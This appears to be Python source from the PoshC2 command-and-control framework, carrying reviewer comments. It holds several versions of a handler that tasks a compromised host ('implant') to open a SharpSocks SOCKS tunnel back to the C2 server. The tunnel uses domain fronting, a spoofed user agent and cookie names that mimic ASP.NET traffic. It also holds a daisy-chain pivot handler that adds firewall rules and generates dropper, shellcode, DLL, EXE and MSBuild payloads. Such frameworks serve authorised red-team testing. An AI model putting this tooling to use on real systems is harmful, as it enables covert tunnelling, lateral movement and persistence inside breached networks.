def do_sharpsocks(user, command, randomuri):
    """Interactively build and queue a SharpSocks task for the implant ``randomuri``.

    Older PowerShell-module variant: the task is a ``Sharpsocks -Client ...``
    string. ``command`` is accepted for the common handler signature but is not
    read here. Returns None; the only effect is the queued task (and label) when
    the operator confirms.
    """
    # Make sure the PowerShell module is available on the implant before tasking it.
    check_module_loaded("SharpSocks.ps1", randomuri, user)
    import string
    from random import choice
    allchar = string.ascii_letters
    # Channel id: 25 ASCII letters drawn with random.choice (the random module, not secrets).
    channel = "".join(choice(allchar) for x in range(25))
    # gen_key() returns bytes; the decoded text is what gets interpolated into the task.
    sharpkey = gen_key().decode("utf-8")
    sharpurls = get_sharpurls()
    sharpurl = get_first_url(select_item("PayloadCommsHost", "C2Server"), select_item("DomainFrontHeader", "C2Server"))
    dfheader = get_first_dfheader(select_item("DomainFrontHeader", "C2Server"))
    implant = get_implantdetails(randomuri)
    pivot = implant.Pivot
    # Only a PowerShell ("PS") pivot uses the configured comms host; anything else
    # asks the operator for the URL instead. The value is used verbatim, no validation.
    if pivot != "PS":
        sharpurl = input("Enter the URL for SharpSocks: ")
    # Shows the server-side command line; note Colours.GREEN is appended after the text.
    print("sharpsocks -c=%s -k=%s --verbose -l=%s\r\n" % (channel, sharpkey, SocksHost) + Colours.GREEN)
    ri = input("Are you ready to start the SharpSocks in the implant? (Y/n) ")
    # "n" only prints a blank line; any other answer than ""/"y" falls through silently.
    if ri.lower() == "n":
        print("")
    if (ri == "") or (ri.lower() == "y"):
        # NOTE(review): -Insecure is always included and -Beacon is fixed at 1000;
        # presumably that disables certificate validation for the implant's
        # comms — confirm against the SharpSocks.ps1 parameters.
        taskcmd = "Sharpsocks -Client -Uri %s -Channel %s -Key %s -URLs %s -Insecure -Beacon 1000" % (sharpurl, channel, sharpkey, sharpurls)
        if dfheader:
            taskcmd += " -DomainFrontURL %s" % dfheader
        new_task(taskcmd, user, randomuri)
        # NOTE(review): indentation was lost in this listing; the label update is
        # placed inside the confirmed branch here — confirm against the original.
        update_label("SharpSocks", randomuri)
def do_sharpsocks(user, command, randomuri):
    """Interactively build and queue a ``run-exe`` SharpSocks task for implant ``randomuri``.

    Variant with a configurable User-Agent. ``command`` is accepted for the
    common handler signature but is not read here. Returns None.
    """
    from random import choice
    # `string` is not imported in this block; it relies on a module-level import
    # outside this view — confirm.
    allchar = string.ascii_letters
    # Channel id: 25 ASCII letters drawn with random.choice (the random module, not secrets).
    channel = "".join(choice(allchar) for x in range(25))
    sharpkey = gen_key().decode("utf-8")
    # Comma-separated list; the task below indexes [0] and [1], so fewer than two
    # entries raises IndexError at that point (no check is made here).
    sharpurls = get_sharpurls()
    sharpurls = sharpurls.split(",")
    # First configured comms host, quotes stripped.
    sharpurl = select_item("PayloadCommsHost", "C2Server").replace('"', '').split(',')[0]
    user_agent = select_item("UserAgent", "C2Server")
    dfheader = get_first_dfheader(select_item("DomainFrontHeader", "C2Server"))
    print("\nIf using Docker, change the SocksHost to be the IP of the PoshC2 Server not 127.0.0.1:49031")
    # SocksHost.split(":")[2] assumes a scheme://host:port form (two colons) — confirm.
    # Colours.GREEN is appended after the text in both prints.
    print("sharpsocks -t latest -s \"-c=%s -k=%s --verbose -l=http://*:%s\"\r" % (channel, sharpkey, SocksHost.split(":")[2]) + Colours.GREEN)
    print("\nElse\n")
    print("sharpsocks -c=%s -k=%s --verbose -l=%s\r\n" % (channel, sharpkey, SocksHost) + Colours.GREEN)
    ri = input("Are you ready to start the SharpSocks in the implant? (Y/n) ")
    # The "" and "y" branches build identical tasks; the cookie names and the
    # beacon (-b 1000) are fixed literals in the task string.
    if ri == "":
        if dfheader:
            new_task("run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 1000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken -df %s --user-agent \"%s\"" % (sharpurl, channel, sharpkey, sharpurls[0].replace("\"", ""), sharpurls[1].replace("\"", ""), dfheader, user_agent), user, randomuri)
        else:
            new_task("run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 1000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken --user-agent \"%s\"" % (sharpurl, channel, sharpkey, sharpurls[0].replace("\"", ""), sharpurls[1].replace("\"", ""), user_agent), user, randomuri)
    if ri.lower() == "y":
        if dfheader:
            new_task("run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 1000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken -df %s --user-agent \"%s\"" % (sharpurl, channel, sharpkey, sharpurls[0].replace("\"", ""), sharpurls[1].replace("\"", ""), dfheader, user_agent), user, randomuri)
        else:
            new_task("run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 1000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken --user-agent \"%s\"" % (sharpurl, channel, sharpkey, sharpurls[0].replace("\"", ""), sharpurls[1].replace("\"", ""), user_agent), user, randomuri)
    # NOTE(review): indentation was lost in this listing; if this print sits at
    # function level as shown, it is emitted even when the operator answered "n" — confirm.
    print("SharpSocks task issued, to stop SharpSocks run stopsocks")
def do_sharpsocks(user, command, randomuri):
    """Interactively build and queue a ``run-exe`` SharpSocks task for implant ``randomuri``.

    Variant without a User-Agent option; the comms host comes from
    get_first_url(). ``command`` is accepted for the common handler signature
    but is not read here. Returns None.
    """
    from random import choice
    # `string` is not imported in this block; it relies on a module-level import
    # outside this view — confirm.
    allchar = string.ascii_letters
    # Channel id: 25 ASCII letters drawn with random.choice (the random module, not secrets).
    channel = "".join(choice(allchar) for x in range(25))
    sharpkey = gen_key().decode("utf-8")
    # Comma-separated list; the task below indexes [0] and [1], so fewer than two
    # entries raises IndexError at that point (no check is made here).
    sharpurls = get_sharpurls()
    sharpurls = sharpurls.split(",")
    sharpurl = get_first_url(select_item("PayloadCommsHost", "C2Server"), select_item("DomainFrontHeader", "C2Server"))
    dfheader = get_first_dfheader(select_item("DomainFrontHeader", "C2Server"))
    # Server-side command line for the operator; Colours.GREEN is appended after the text.
    print("sharpsocks -c=%s -k=%s --verbose -l=%s\r\n" % (channel, sharpkey, SocksHost) + Colours.GREEN)
    ri = input("Are you ready to start the SharpSocks in the implant? (Y/n) ")
    # The "" and "y" branches build identical tasks; the cookie names and the
    # beacon (-b 1000) are fixed literals in the task string.
    if ri == "":
        if dfheader:
            new_task("run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 1000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken -df %s" % (sharpurl, channel, sharpkey, sharpurls[0].replace("\"", ""), sharpurls[1].replace("\"", ""), dfheader), user, randomuri)
        else:
            new_task("run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 1000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken" % (sharpurl, channel, sharpkey, sharpurls[0].replace("\"", ""), sharpurls[1].replace("\"", "")), user, randomuri)
    if ri.lower() == "y":
        if dfheader:
            new_task("run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 1000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken -df %s" % (sharpurl, channel, sharpkey, sharpurls[0].replace("\"", ""), sharpurls[1].replace("\"", ""), dfheader), user, randomuri)
        else:
            new_task("run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 1000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken" % (sharpurl, channel, sharpkey, sharpurls[0].replace("\"", ""), sharpurls[1].replace("\"", "")), user, randomuri)
    # NOTE(review): indentation was lost in this listing; if this print sits at
    # function level as shown, it is emitted even when the operator answered "n" — confirm.
    print("SharpSocks task issued, to stop SharpSocks run stopsocks")
def do_startdaisy(user, command, randomuri):
    """Interactively build an ``invoke-daisychain`` task for implant ``randomuri``, then optionally create daisy payloads.

    The ``command`` parameter is overwritten with the generated task string; the
    caller's value is never read. Every answer is read with input() (the proxy
    password included, so it is echoed to the terminal) and interpolated into
    the task string as typed, with no escaping of the surrounding quotes.
    Returns None.
    """
    check_module_loaded("invoke-daisychain.ps1", randomuri, user)
    elevated = input(Colours.GREEN + "Are you elevated? Y/n " + Colours.END)
    domain_front = ""
    proxy_user = ""
    proxy_pass = ""
    proxy_url = ""
    cred_expiry = ""
    # Unelevated: bind to localhost only, after an explicit confirmation (default is abort).
    if elevated.lower() == "n":
        cont = input(Colours.RED + "Daisy from an unelevated context can only bind to localhost, continue? y/N " + Colours.END)
        if cont.lower() == "n" or cont == "":
            return
        bind_ip = "localhost"
    else:
        bind_ip = input(Colours.GREEN + "Bind IP on the daisy host: " + Colours.END)
    bind_port = input(Colours.GREEN + "Bind Port on the daisy host: " + Colours.END)
    firstdaisy = input(Colours.GREEN + "Is this the first daisy in the chain? Y/n? " + Colours.END)
    default_url = get_first_url(PayloadCommsHost, DomainFrontHeader)
    default_df_header = get_first_dfheader(DomainFrontHeader)
    # A front header equal to the URL itself is treated as "no front header".
    if default_df_header == default_url:
        default_df_header = None
    if firstdaisy.lower() == "y" or firstdaisy == "":
        # First hop talks to the C2 directly: upstream URL, optional front header and proxy settings.
        upstream_url = input(Colours.GREEN + f"C2 URL (leave blank for {default_url}): " + Colours.END)
        domain_front = input(Colours.GREEN + f"Domain front header (leave blank for {str(default_df_header)}): " + Colours.END)
        proxy_user = input(Colours.GREEN + "Proxy user (<domain>\\<username>, leave blank if none): " + Colours.END)
        proxy_pass = input(Colours.GREEN + "Proxy password (leave blank if none): " + Colours.END)
        proxy_url = input(Colours.GREEN + "Proxy URL (leave blank if none): " + Colours.END)
        # This prompt has no Colours.END, unlike the others; the colour state is left open.
        cred_expiry = input(Colours.GREEN + "Password/Account Expiration Date: .e.g. 15/03/2018: ")
        if not upstream_url:
            upstream_url = default_url
        if not domain_front:
            if default_df_header:
                domain_front = default_df_header
            else:
                domain_front = ""
    else:
        # Later hop: upstream is the previous daisy host, always plain http.
        upstream_daisy_host = input(Colours.GREEN + "Upstream daisy server: " + Colours.END)
        upstream_daisy_port = input(Colours.GREEN + "Upstream daisy port: " + Colours.END)
        upstream_url = f"http://{upstream_daisy_host}:{upstream_daisy_port}"
    command = f"invoke-daisychain -daisyserver http://{bind_ip} -port {bind_port} -c2server {upstream_url}"
    if domain_front:
        command = command + f" -domfront {domain_front}"
    # Values are wrapped in single quotes but not escaped, so a quote in the input breaks the command.
    if proxy_url:
        command = command + f" -proxyurl '{proxy_url}'"
    if proxy_user:
        command = command + f" -proxyuser '{proxy_user}'"
    if proxy_pass:
        command = command + f" -proxypassword '{proxy_pass}'"
    # NOTE(review): this test is the mirror of the earlier `== "n"` check but not
    # its complement — an answer other than "", "y" or "n" takes the bind-IP
    # prompt above yet gets " -localhost" here. Firewall rule is opt-in (default: -nofwrule).
    if elevated.lower() == "y" or elevated == "":
        firewall = input(Colours.GREEN + "Add firewall rule? (uses netsh.exe) y/N: ")
        if firewall.lower() == "n" or firewall == "":
            command = command + " -nofwrule"
    else:
        print_good("Not elevated so binding to localhost and not adding firewall rule")
        command = command + " -localhost"
    urls = get_allurls()
    command = command + f" -urls '{urls}'"
    new_task(command, user, randomuri)
    update_label("DaisyHost", randomuri)
    createpayloads = input(Colours.GREEN + "Would you like to create payloads for this Daisy Server? Y/n ")
    if createpayloads.lower() == "y" or createpayloads == "":
        name = input(Colours.GREEN + "Enter a payload name: " + Colours.END)
        daisyhost = get_implantdetails(randomuri)
        # PowerShell snippet injected into the payload to bypass the proxy when none is configured.
        proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
        C2 = get_c2server_all()
        # Registers the daisy endpoint (quoted URL, empty front header) together with
        # the proxy credentials and expiry collected above.
        urlId = new_urldetails(name, f"\"http://{bind_ip}:{bind_port}\"", "\"\"", proxy_url, proxy_user, proxy_pass, cred_expiry)
        newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, "%s?d" % get_newimplanturl(), PayloadsDirectory, URLID=urlId, PowerShellProxyCommand=proxynone)
        # Rewrites the "$pid;<upstream_url>" marker in the dropper to "$pid;<user>@<domain>"
        # of the daisy host; if the marker is absent the replace is a no-op.
        newPayload.PSDropper = (newPayload.PSDropper).replace("$pid;%s" % (upstream_url), "$pid;%s@%s" % (daisyhost.User, daisyhost.Domain))
        newPayload.CreateDroppers(name)
        newPayload.CreateRaw(name)
        newPayload.CreateDlls(name)
        newPayload.CreateShellcode(name)
        newPayload.CreateEXE(name)
        newPayload.CreateMsbuild(name)
        print_good("Created new %s daisy payloads" % name)
def do_sharpsocks(user, command, randomuri):
    """Interactively build and queue a ``run-exe`` SharpSocksImplant task for implant ``randomuri``.

    prompt_toolkit variant: each setting (URIs, domain, host header, user agent,
    beacon) is asked with a PromptSession backed by a per-setting history file
    under PoshProjectDirectory. ``command`` is the operator's full command line;
    it is checked for a verbose flag and everything after ``"sharpsocks "`` is
    appended to the implant task verbatim. Returns None; returns early (no task)
    on validation failure or when the operator declines.
    """
    style = Style.from_dict({
        '': '#80d130',
    })
    from random import choice
    # Channel id: 25 ASCII letters drawn with random.choice (the random module, not secrets).
    # `string` relies on a module-level import outside this view — confirm.
    channel = "".join(choice(string.ascii_letters) for _ in range(25))
    sharp_key = gen_key().decode("utf-8")
    default_sharp_urls = get_sharpurls()
    urls_prompt = PromptSession(history=FileHistory(f'{PoshProjectDirectory}/.comma-separated-urls-history'), auto_suggest=AutoSuggestFromHistory(), style=style)
    socks_proxy_urls = urls_prompt.prompt(f"What URIs would you like to use for SharpSocks? Default is {default_sharp_urls.replace(' ', '')}: ")
    if not socks_proxy_urls:
        socks_proxy_urls = default_sharp_urls
    socks_proxy_urls = socks_proxy_urls.split(",")
    # The task uses exactly two URIs ([0] and [1]); extra entries are ignored.
    if len(socks_proxy_urls) < 2:
        print("Please specify at least two URIs")
        return
    # Normalise: drop double quotes and surrounding whitespace, then a single leading "/".
    socks_proxy_urls = [i.replace("\"", "").strip() for i in socks_proxy_urls]
    socks_proxy_urls = [(i[1:] if i.startswith("/") else i) for i in socks_proxy_urls]
    default_sharp_url = select_item("PayloadCommsHost", "C2Server").replace('"', '').split(',')[0]
    domains_prompt = PromptSession(history=FileHistory(f'{PoshProjectDirectory}/.protocol-and-domain-history'), auto_suggest=AutoSuggestFromHistory(), style=style)
    sharp_url = domains_prompt.prompt(f"What domain would you like to use for SharpSocks? Default is {default_sharp_url}: ")
    if not sharp_url:
        sharp_url = default_sharp_url
    # Only the "http" prefix is checked, so "https" passes too; nothing else about the URL is validated.
    if not sharp_url.startswith("http"):
        print("Please specify a protocol (http/https)")
        return
    default_host_header = get_first_dfheader(select_item("DomainFrontHeader", "C2Server"))
    host_headers_prompt = PromptSession(history=FileHistory('%s/.host-headers-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
    host_header = host_headers_prompt.prompt(f"What host header should used? Default is {default_host_header}: ")
    if not host_header:
        host_header = default_host_header
    default_user_agent = select_item("UserAgent", "C2Server")
    user_agent_prompt = PromptSession(history=FileHistory('%s/.user-agents-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
    user_agent = user_agent_prompt.prompt(f"What user agent? Default is \"{default_user_agent}\": ")
    if not user_agent:
        user_agent = default_user_agent
    default_beacon = "200"
    beacon_prompt = PromptSession(history=FileHistory('%s/.beacon-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
    beacon = beacon_prompt.prompt(f"What beacon interval would you like SharpSocks to use (ms)? Default: {default_beacon}ms: ")
    if not beacon:
        beacon = default_beacon
    # Strips a trailing "ms" unit only; the remaining text is not checked to be numeric.
    if beacon.strip().endswith("ms"):
        beacon = beacon.replace("ms", "").strip()
    server_command = f"{PoshInstallDirectory}resources/SharpSocks/SharpSocksServer/SharpSocksServer -c={channel} -k={sharp_key} -l={SocksHost} -v"
    # Verbose is detected on the operator's command line; "-v" is already in
    # server_command, so this adds "--verbose" alongside it.
    if " -v" in command or " --verbose" in command:
        server_command += " --verbose"
    server_command += "\n"
    print(Colours.GREEN + "\nOk, run this command from your SharpSocksServer directory to launch the SharpSocks server:\n")
    print(server_command)
    # Cookie names are fixed literals; the same beacon value is passed as both -b and -r.
    task = f"run-exe SharpSocksImplant.Program SharpSocksImplant -s {sharp_url} -c {channel} -k {sharp_key} -url1 {socks_proxy_urls[0]} -url2 {socks_proxy_urls[1]} -b {beacon} -r {beacon} --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken --user-agent \"{user_agent}\""
    if host_header:
        task += f" -df {host_header}"
    # Anything after "sharpsocks " on the operator's line is appended to the implant task
    # unchanged — this includes a "-v"/"--verbose" that was only meant for the server.
    extra_args = command.replace("sharpsocks ", "").strip()
    if extra_args:
        task += " " + extra_args
    confirm = input("Are you ready to start the SharpSocks in the implant? (Y/n) ")
    if confirm == "" or confirm.lower() == "y":
        new_task(task, user, randomuri)
    else:
        print("Aborted...")
        return
    print("SharpSocks task issued, to stop SharpSocks run stopsocks")